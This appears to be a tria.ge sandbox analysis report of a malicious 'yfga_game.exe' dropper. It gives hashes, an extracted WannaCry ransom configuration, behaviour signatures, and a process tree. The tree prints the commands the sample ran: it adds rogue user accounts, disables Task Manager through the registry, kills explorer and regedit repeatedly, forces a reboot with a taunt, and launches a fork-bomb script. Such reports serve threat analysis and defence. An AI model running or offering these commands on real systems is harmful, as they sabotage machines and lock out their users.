Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
15/07/2024, 12:26
240715-pmah5stdrh 1015/07/2024, 12:01
240715-n64ewsyfjb 1015/07/2024, 11:54
240715-n278aaxhmd 1015/07/2024, 11:32
240715-nnry5sthpm 10Analysis
-
max time kernel
57s -
max time network
62s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
15/07/2024, 11:54
Static task
static1
Behavioral task
behavioral1
Sample
yfga_game.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
yfga_game.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
yfga_game.exe
Resource
win11-20240709-en
General
-
Target
yfga_game.exe
-
Size
46.7MB
-
MD5
9d846a2d794eb4614b3d0feaa6f83259
-
SHA1
ff6d194172fa313b8921a80cecc84f470d8dc2d0
-
SHA256
cfd64f9ed065d19f7c488db3a8e29a553c9e61849b1d08765006110d73d3434b
-
SHA512
6a8115aa70bd1d0d0af474a2d9d5f4ad03e2fa09277a1f3f3e6063682329b1b42aeef206f4a74d2fb76cd12afe4daf0bd1571c26c7121741a782241d3d28b521
-
SSDEEP
786432:c7Ud58tChs1g2uzRx7KPB8NUc3sXEPeEwkHYvgctIKpJZXnfsrQl92Z3tHDUOsj1:4t96L76B0HkGUvgcaKpDPBl92HHDdsGy
Malware Config
Extracted
C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\@[email protected]
wannacry
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Signatures
-
Wannacry
WannaCry is a ransomware cryptoworm.
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Disables Task Manager via registry modification
-
resource yara_rule behavioral1/files/0x00050000000187c0-59.dat aspack_v212_v242 behavioral1/files/0x00060000000170da-72.dat aspack_v212_v242 -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDBFB6.tmp wannacryptor.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDBFC9.tmp wannacryptor.exe -
Executes dropped EXE 15 IoCs
pid Process 3052 calc.exe 1096 screenscrew.exe 620 flasher.exe 2244 walliant.exe 1820 jokewarehydra.exe 640 YouAreAnIdiot.exe 1232 walliant.tmp 336 win7recovery.exe 1724 WbVhxCIDDK.exe 2344 wannacryptor.exe 2636 taskdl.exe 1340 @[email protected] 2924 @[email protected] 2704 taskhsvc.exe 1812 @[email protected] -
Loads dropped DLL 37 IoCs
pid Process 2744 cmd.exe 2744 cmd.exe 2744 cmd.exe 2744 cmd.exe 2744 cmd.exe 2744 cmd.exe 2744 cmd.exe 2188 cmd.exe 2744 cmd.exe 2244 walliant.exe 640 YouAreAnIdiot.exe 640 YouAreAnIdiot.exe 2164 WerFault.exe 2164 WerFault.exe 2164 WerFault.exe 2164 WerFault.exe 2164 WerFault.exe 2744 cmd.exe 2744 cmd.exe 336 win7recovery.exe 336 win7recovery.exe 2744 cmd.exe 2344 wannacryptor.exe 2344 wannacryptor.exe 2848 cscript.exe 2344 wannacryptor.exe 2344 wannacryptor.exe 1868 cmd.exe 1340 @[email protected] 1340 @[email protected] 2704 taskhsvc.exe 2704 taskhsvc.exe 2704 taskhsvc.exe 2704 taskhsvc.exe 2704 taskhsvc.exe 2704 taskhsvc.exe 2344 wannacryptor.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 1904 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/336-1782-0x0000000000600000-0x0000000000678000-memory.dmp upx -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows\CurrentVersion\Run\WbVhxCIDDK = "C:\\ProgramData\\WbVhxCIDDK.exe" win7recovery.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\exmpfvgynhzzzhy763 = "\"C:\\Users\\Admin\\Desktop\\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\\tasksche.exe\"" reg.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Sets desktop wallpaper using registry 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" @[email protected] Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Control Panel\Desktop\WallPaper = "C:\\Windows\\System32\\FeatureToastBulldogImg.png" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" wannacryptor.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2164 640 WerFault.exe 46 -
Delays execution with timeout.exe 4 IoCs
pid Process 2492 timeout.exe 304 timeout.exe 2452 timeout.exe 700 timeout.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2804 vssadmin.exe -
Kills process with taskkill 54 IoCs
pid Process 2276 taskkill.exe 2808 taskkill.exe 1692 taskkill.exe 1724 taskkill.exe 2344 taskkill.exe 1992 taskkill.exe 1280 taskkill.exe 584 taskkill.exe 2176 taskkill.exe 2776 taskkill.exe 2508 taskkill.exe 1312 taskkill.exe 1160 taskkill.exe 936 taskkill.exe 1532 taskkill.exe 2628 taskkill.exe 1672 taskkill.exe 264 taskkill.exe 2040 taskkill.exe 1684 taskkill.exe 2572 taskkill.exe 1904 taskkill.exe 2348 taskkill.exe 2408 taskkill.exe 2736 taskkill.exe 2200 taskkill.exe 2064 taskkill.exe 892 taskkill.exe 2576 taskkill.exe 2640 taskkill.exe 2196 taskkill.exe 2004 taskkill.exe 888 taskkill.exe 2844 taskkill.exe 828 taskkill.exe 1684 taskkill.exe 1192 taskkill.exe 1576 taskkill.exe 2980 taskkill.exe 572 taskkill.exe 1080 taskkill.exe 3056 taskkill.exe 2776 taskkill.exe 2304 taskkill.exe 2668 taskkill.exe 2716 taskkill.exe 800 taskkill.exe 1256 taskkill.exe 2380 taskkill.exe 1996 taskkill.exe 1888 taskkill.exe 2664 taskkill.exe 2928 taskkill.exe 928 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Download win7recovery.exe Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Download\CheckExeSignatures = "no" win7recovery.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1600 reg.exe -
Runs net.exe
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 336 win7recovery.exe 336 win7recovery.exe 336 win7recovery.exe 1724 WbVhxCIDDK.exe 1724 WbVhxCIDDK.exe 1724 WbVhxCIDDK.exe 336 win7recovery.exe 336 win7recovery.exe 1724 WbVhxCIDDK.exe 1724 WbVhxCIDDK.exe 336 win7recovery.exe 336 win7recovery.exe 1724 WbVhxCIDDK.exe 1724 WbVhxCIDDK.exe 336 win7recovery.exe 336 win7recovery.exe 1724 WbVhxCIDDK.exe 1724 WbVhxCIDDK.exe 336 win7recovery.exe 336 win7recovery.exe 1724 WbVhxCIDDK.exe 1724 WbVhxCIDDK.exe 2704 taskhsvc.exe 2704 taskhsvc.exe 336 win7recovery.exe 336 win7recovery.exe 1724 WbVhxCIDDK.exe 1724 WbVhxCIDDK.exe 2704 taskhsvc.exe 336 win7recovery.exe 336 win7recovery.exe 1724 WbVhxCIDDK.exe 1724 WbVhxCIDDK.exe 336 win7recovery.exe 336 win7recovery.exe 1724 WbVhxCIDDK.exe 1724 WbVhxCIDDK.exe 336 win7recovery.exe 336 win7recovery.exe 1724 WbVhxCIDDK.exe 1724 WbVhxCIDDK.exe 336 win7recovery.exe 336 win7recovery.exe 1724 WbVhxCIDDK.exe 1724 WbVhxCIDDK.exe 336 win7recovery.exe 336 win7recovery.exe 1724 WbVhxCIDDK.exe 1724 WbVhxCIDDK.exe 336 win7recovery.exe 336 win7recovery.exe 1724 WbVhxCIDDK.exe 1724 WbVhxCIDDK.exe 336 win7recovery.exe 336 win7recovery.exe 1724 WbVhxCIDDK.exe 1724 WbVhxCIDDK.exe 336 win7recovery.exe 336 win7recovery.exe 1724 WbVhxCIDDK.exe 1724 WbVhxCIDDK.exe 336 win7recovery.exe 336 win7recovery.exe 1724 WbVhxCIDDK.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1576 taskkill.exe Token: SeDebugPrivilege 1904 taskkill.exe Token: SeDebugPrivilege 1888 taskkill.exe Token: SeShutdownPrivilege 2964 shutdown.exe Token: SeRemoteShutdownPrivilege 2964 shutdown.exe Token: SeDebugPrivilege 800 taskkill.exe Token: SeDebugPrivilege 2348 taskkill.exe Token: SeDebugPrivilege 1280 taskkill.exe Token: SeDebugPrivilege 2064 taskkill.exe Token: SeDebugPrivilege 2664 taskkill.exe Token: SeDebugPrivilege 2640 taskkill.exe Token: SeDebugPrivilege 828 taskkill.exe Token: SeDebugPrivilege 2928 taskkill.exe Token: SeDebugPrivilege 2196 taskkill.exe Token: SeDebugPrivilege 2408 taskkill.exe Token: SeDebugPrivilege 1684 taskkill.exe Token: SeDebugPrivilege 2004 taskkill.exe Token: SeDebugPrivilege 572 taskkill.exe Token: SeDebugPrivilege 264 taskkill.exe Token: SeDebugPrivilege 2304 taskkill.exe Token: SeDebugPrivilege 2716 taskkill.exe Token: SeDebugPrivilege 1692 taskkill.exe Token: SeDebugPrivilege 888 taskkill.exe Token: SeDebugPrivilege 1256 taskkill.exe Token: SeDebugPrivilege 2980 taskkill.exe Token: SeDebugPrivilege 1160 taskkill.exe Token: SeDebugPrivilege 584 taskkill.exe Token: SeDebugPrivilege 2380 taskkill.exe Token: SeDebugPrivilege 2344 taskkill.exe Token: SeDebugPrivilege 2844 taskkill.exe Token: SeDebugPrivilege 2668 taskkill.exe Token: SeDebugPrivilege 1992 taskkill.exe Token: SeDebugPrivilege 2040 taskkill.exe Token: SeDebugPrivilege 1684 taskkill.exe Token: SeDebugPrivilege 1080 taskkill.exe Token: SeDebugPrivilege 2572 taskkill.exe Token: SeDebugPrivilege 2736 taskkill.exe Token: SeShutdownPrivilege 2668 shutdown.exe Token: SeRemoteShutdownPrivilege 2668 shutdown.exe Token: SeDebugPrivilege 892 taskkill.exe Token: SeDebugPrivilege 2200 taskkill.exe Token: SeDebugPrivilege 936 taskkill.exe Token: SeDebugPrivilege 1724 taskkill.exe Token: SeDebugPrivilege 2628 taskkill.exe Token: SeDebugPrivilege 3056 taskkill.exe Token: SeDebugPrivilege 1996 taskkill.exe Token: SeDebugPrivilege 2276 taskkill.exe Token: SeDebugPrivilege 2808 taskkill.exe Token: SeDebugPrivilege 2776 taskkill.exe Token: SeDebugPrivilege 1672 taskkill.exe Token: SeDebugPrivilege 2176 taskkill.exe Token: SeDebugPrivilege 2776 taskkill.exe Token: SeDebugPrivilege 928 taskkill.exe Token: SeDebugPrivilege 2508 taskkill.exe Token: SeDebugPrivilege 1312 taskkill.exe Token: SeDebugPrivilege 1192 taskkill.exe Token: SeDebugPrivilege 1532 taskkill.exe Token: SeDebugPrivilege 2576 taskkill.exe Token: SeBackupPrivilege 2328 vssvc.exe Token: SeRestorePrivilege 2328 vssvc.exe Token: SeAuditPrivilege 2328 vssvc.exe Token: SeIncreaseQuotaPrivilege 1592 WMIC.exe Token: SeSecurityPrivilege 1592 WMIC.exe Token: SeTakeOwnershipPrivilege 1592 WMIC.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2924 @[email protected] 1340 @[email protected] 2924 @[email protected] 1340 @[email protected] 1812 @[email protected] 1812 @[email protected] -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2528 wrote to memory of 2744 2528 yfga_game.exe 29 PID 2528 wrote to memory of 2744 2528 yfga_game.exe 29 PID 2528 wrote to memory of 2744 2528 yfga_game.exe 29 PID 2528 wrote to memory of 2744 2528 yfga_game.exe 29 PID 2744 wrote to memory of 2740 2744 cmd.exe 32 PID 2744 wrote to memory of 2740 2744 cmd.exe 32 PID 2744 wrote to memory of 2740 2744 cmd.exe 32 PID 2744 wrote to memory of 2740 2744 cmd.exe 32 PID 2744 wrote to memory of 2060 2744 cmd.exe 33 PID 2744 wrote to memory of 2060 2744 cmd.exe 33 PID 2744 wrote to memory of 2060 2744 cmd.exe 33 PID 2744 wrote to memory of 2060 2744 cmd.exe 33 PID 2060 wrote to memory of 2248 2060 net.exe 34 PID 2060 wrote to memory of 2248 2060 net.exe 34 PID 2060 wrote to memory of 2248 2060 net.exe 34 PID 2060 wrote to memory of 2248 2060 net.exe 34 PID 2744 wrote to memory of 2504 2744 cmd.exe 35 PID 2744 wrote to memory of 2504 2744 cmd.exe 35 PID 2744 wrote to memory of 2504 2744 cmd.exe 35 PID 2744 wrote to memory of 2504 2744 cmd.exe 35 PID 2744 wrote to memory of 1096 2744 cmd.exe 36 PID 2744 wrote to memory of 1096 2744 cmd.exe 36 PID 2744 wrote to memory of 1096 2744 cmd.exe 36 PID 2744 wrote to memory of 1096 2744 cmd.exe 36 PID 2744 wrote to memory of 620 2744 cmd.exe 37 PID 2744 wrote to memory of 620 2744 cmd.exe 37 PID 2744 wrote to memory of 620 2744 cmd.exe 37 PID 2744 wrote to memory of 620 2744 cmd.exe 37 PID 2744 wrote to memory of 3052 2744 cmd.exe 38 PID 2744 wrote to memory of 3052 2744 cmd.exe 38 PID 2744 wrote to memory of 3052 2744 cmd.exe 38 PID 2744 wrote to memory of 3052 2744 cmd.exe 38 PID 2744 wrote to memory of 2188 2744 cmd.exe 39 PID 2744 wrote to memory of 2188 2744 cmd.exe 39 PID 2744 wrote to memory of 2188 2744 cmd.exe 39 PID 2744 wrote to memory of 2188 2744 cmd.exe 39 PID 2744 wrote to memory of 2244 2744 cmd.exe 40 PID 2744 wrote to memory of 2244 2744 cmd.exe 40 PID 2744 wrote to memory of 2244 2744 cmd.exe 40 PID 2744 wrote to memory of 2244 2744 cmd.exe 40 PID 2744 wrote to memory of 2244 2744 cmd.exe 40 PID 2744 wrote to memory of 2244 2744 cmd.exe 40 PID 2744 wrote to memory of 2244 2744 cmd.exe 40 PID 2744 wrote to memory of 2108 2744 cmd.exe 41 PID 2744 wrote to memory of 2108 2744 cmd.exe 41 PID 2744 wrote to memory of 2108 2744 cmd.exe 41 PID 2744 wrote to memory of 2108 2744 cmd.exe 41 PID 2108 wrote to memory of 2088 2108 net.exe 42 PID 2108 wrote to memory of 2088 2108 net.exe 42 PID 2108 wrote to memory of 2088 2108 net.exe 42 PID 2108 wrote to memory of 2088 2108 net.exe 42 PID 2744 wrote to memory of 1892 2744 cmd.exe 44 PID 2744 wrote to memory of 1892 2744 cmd.exe 44 PID 2744 wrote to memory of 1892 2744 cmd.exe 44 PID 2744 wrote to memory of 1892 2744 cmd.exe 44 PID 2188 wrote to memory of 1820 2188 cmd.exe 45 PID 2188 wrote to memory of 1820 2188 cmd.exe 45 PID 2188 wrote to memory of 1820 2188 cmd.exe 45 PID 2188 wrote to memory of 1820 2188 cmd.exe 45 PID 2744 wrote to memory of 640 2744 cmd.exe 46 PID 2744 wrote to memory of 640 2744 cmd.exe 46 PID 2744 wrote to memory of 640 2744 cmd.exe 46 PID 2744 wrote to memory of 640 2744 cmd.exe 46 PID 2744 wrote to memory of 1576 2744 cmd.exe 47 -
System policy modification 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System win7recovery.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" win7recovery.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 2220 attrib.exe 2900 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\yfga_game.exe"C:\Users\Admin\AppData\Local\Temp\yfga_game.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\YFGA.bat" "2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\IMPORTANT.txt3⤵PID:2740
-
-
C:\Windows\SysWOW64\net.exenet user "GO BACK!" "???" /add3⤵
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "GO BACK!" "???" /add4⤵PID:2248
-
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskManager" /t REG_DWORD /d 13⤵PID:2504
-
-
C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\screenscrew.exescreenscrew.exe3⤵
- Executes dropped EXE
PID:1096
-
-
C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\flasher.exeflasher.exe3⤵
- Executes dropped EXE
PID:620
-
-
C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\calc.execalc.exe3⤵
- Executes dropped EXE
PID:3052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K hydra.cmd3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\jokewarehydra.exejokewarehydra.exe4⤵
- Executes dropped EXE
PID:1820
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy3.vbs"4⤵PID:1192
-
-
-
C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\walliant.exewalliant.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2244 -
C:\Users\Admin\AppData\Local\Temp\is-DV8I8.tmp\walliant.tmp"C:\Users\Admin\AppData\Local\Temp\is-DV8I8.tmp\walliant.tmp" /SL5="$30180,4511977,830464,C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\walliant.exe"4⤵
- Executes dropped EXE
PID:1232
-
-
-
C:\Windows\SysWOW64\net.exenet user "FUCK OFF YFGA" "I DONT KNOW" /add3⤵
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "FUCK OFF YFGA" "I DONT KNOW" /add4⤵PID:2088
-
-
-
C:\Windows\SysWOW64\reg.exereg import reg.reg3⤵
- Sets desktop wallpaper using registry
PID:1892
-
-
C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\YouAreAnIdiot.exeyouareanidiot.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:640 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 640 -s 8764⤵
- Loads dropped DLL
- Program crash
PID:2164
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im fontdrvhost.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im TextInputhost.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1904
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im explorer.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1888
-
-
C:\Windows\SysWOW64\timeout.exetimeout 53⤵
- Delays execution with timeout.exe
PID:2492
-
-
C:\Windows\SysWOW64\shutdown.exeshutdown /r /t 30000 /c "HAHA I HACKED YOU AYFGA ROCKS YOU"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K spam.bat "forkbomb" /min3⤵PID:2392
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"4⤵PID:928
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:800
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im regedit.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"4⤵PID:3068
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"4⤵PID:1648
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1280
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im regedit.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2064
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"4⤵PID:2836
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"4⤵PID:2920
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im regedit.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2640
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"4⤵PID:2316
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"4⤵PID:1772
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:828
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im regedit.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"4⤵PID:2916
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"4⤵PID:2924
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im regedit.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"4⤵PID:1548
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"4⤵PID:2396
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1684
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im regedit.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2004
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"4⤵PID:2976
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"4⤵PID:776
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:572
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im regedit.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:264
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"4⤵PID:1836
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"4⤵PID:2800
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2304
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im regedit.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"4⤵PID:2636
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"4⤵PID:2248
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im regedit.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:888
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"4⤵PID:1924
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"4⤵PID:1020
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1256
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im regedit.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2980
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"4⤵PID:1608
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy.vbs"4⤵PID:1676
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1160
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im regedit.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:584
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\annoy2.vbs"4⤵PID:1312
-
-
